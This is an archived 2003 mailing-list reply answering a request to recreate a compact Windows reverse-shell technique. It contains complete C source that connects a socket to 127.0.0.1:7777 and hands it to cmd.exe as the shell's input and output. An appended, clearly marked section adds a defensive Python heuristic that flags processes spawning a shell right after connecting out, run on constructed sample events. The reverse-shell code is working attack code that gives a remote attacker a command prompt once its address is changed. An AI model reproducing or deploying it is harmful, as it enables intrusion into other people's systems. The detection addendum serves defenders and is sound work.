Re: Windows reverse Shell
From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: 02/04/03
- Previous message: Rob Shein: "RE: Possible DOS against search engines?"
- In reply to: NetNinja: "Windows reverse Shell"
- Next in thread: 3APA3A: "Re[2]: Windows reverse Shell"
- Reply: 3APA3A: "Re[2]: Windows reverse Shell"
- Reply: A***: "Re[2]: Windows reverse Shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 4 Feb 2003 19:34:56 +0300 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> To: SecFocus <netninja@hotmail.kg>
Dear NetNinja,
The code below successfully brings a reverse shell to 127.0.0.1:7777.
#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]){
    WSADATA wd;
    SOCKET sock;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in sin;
    int size = sizeof(sin);

    memset(&sin, 0, sizeof(sin));
    memset(&si, 0, sizeof(si));
    WSAStartup(MAKEWORD(1, 1), &wd);
    /* socket handle created with WSASocket(), flags 0 */
    sock = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sin.sin_family = AF_INET;
    bind(sock, (struct sockaddr*)&sin, size);   /* port 0: any local port */
    sin.sin_port = htons(7777);
    sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    connect(sock, (struct sockaddr*)&sin, size);
    /* hand the socket to the child as stdin/stdout/stderr */
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;
    /* bInheritHandles = TRUE, otherwise the child never sees the socket */
    CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        0,
        0,
        NULL,
        &si,
        &pi
    );
    return 0;
}
--Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:
N> Hello guys,
N> David Litchfield in his Blackhat talk, talked about using the socket handle
N> from WSASocket() and passing that handle as a parameter to stdin, stdout
N> and stderr for the CreateProcess function. By doing it this way his reverse
N> cmd shellcode becomes much smaller. I tried coding that reverse
N> command shell in C, but couldn't get it to work. It simply connects to
N> my listening netcat listener and then disconnects. David Litchfield
N> used 4 functions to achieve that: WSASocket, bind, connect and
N> CreateProcess. A little help would be appreciated on building this reverse
N> cmd shell. Thanks.
-- ~/ZARAZA Venerable fossils! I await your further letters. (Twain)
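The pattern discussed in this thread (a process opens an outbound socket, then spawns cmd.exe with that socket inherited as its standard handles) leaves a simple footprint in process-creation and network-connection telemetry: a non-interactive parent that makes a TCP connection and, within a second or two, becomes the parent of a command shell. The following is an added detection example, not code from the thread or from either poster; it assumes a simplified Sysmon-like event shape (event_id 3 for network connections, event_id 1 for process creation) and runs over constructed sample events, not real logs.

```python
from datetime import datetime, timedelta
from os.path import basename

# Constructed sample events in a simplified Sysmon-like shape (not real logs):
# event_id 3 = network connection, event_id 1 = process creation.
SAMPLE_EVENTS = [
    {"event_id": 3, "time": "2003-02-04T19:34:56", "pid": 1234,
     "image": "C:\\Temp\\rs.exe", "dst": "127.0.0.1:7777"},
    {"event_id": 1, "time": "2003-02-04T19:34:57", "pid": 1240, "ppid": 1234,
     "image": "C:\\WINDOWS\\system32\\cmd.exe"},
    {"event_id": 3, "time": "2003-02-04T19:40:00", "pid": 2000,
     "image": "C:\\Program Files\\Browser\\browser.exe", "dst": "10.0.0.5:80"},
    {"event_id": 1, "time": "2003-02-04T19:40:03", "pid": 2100, "ppid": 2000,
     "image": "C:\\WINDOWS\\system32\\notepad.exe"},
    # same parent spawns a shell again much later: outside the default window
    {"event_id": 1, "time": "2003-02-04T20:10:00", "pid": 3000, "ppid": 1234,
     "image": "C:\\WINDOWS\\system32\\cmd.exe"},
]

# Child images worth flagging when they inherit a freshly connected socket.
SHELL_IMAGES = {"cmd.exe", "command.com"}


def _ts(s):
    return datetime.fromisoformat(s)


def _image_name(path):
    # basename() on a non-Windows host does not split on backslashes
    return basename(path.replace("\\", "/")).lower()


def find_socket_fed_shells(events, window_seconds=5):
    """Return one finding per shell child created within window_seconds after
    its parent process made an outbound connection."""
    connects = {}   # parent pid -> list of (time, dst, parent image)
    findings = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        if ev["event_id"] == 3:
            connects.setdefault(ev["pid"], []).append(
                (_ts(ev["time"]), ev["dst"], ev["image"]))
        elif ev["event_id"] == 1 and _image_name(ev["image"]) in SHELL_IMAGES:
            spawn_time = _ts(ev["time"])
            for conn_time, dst, parent_image in connects.get(ev.get("ppid"), []):
                delta = spawn_time - conn_time
                if timedelta(0) <= delta <= timedelta(seconds=window_seconds):
                    findings.append({
                        "parent_pid": ev["ppid"],
                        "parent_image": parent_image,
                        "dst": dst,
                        "child_pid": ev["pid"],
                        "child_image": ev["image"],
                        "seconds_after_connect": delta.total_seconds(),
                    })
                    break   # one finding per child is enough
    return findings


if __name__ == "__main__":
    for f in find_socket_fed_shells(SAMPLE_EVENTS):
        print("shell %d (%s) spawned %.0fs after parent %d (%s) connected to %s" % (
            f["child_pid"], f["child_image"], f["seconds_after_connect"],
            f["parent_pid"], f["parent_image"], f["dst"]))
```

The correlation is a heuristic, not proof that the socket was inherited: terminal emulators, SSH clients and remote-administration agents legitimately connect out and then start a shell, so the window and the parent-image allow-list need tuning per environment. Confirming the handle sharing itself requires inspecting the child's handle table (for example with a handle-enumeration tool on the live host), which this log-only check does not attempt.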
- Next message: 3APA3A: "Re[2]: Windows reverse Shell"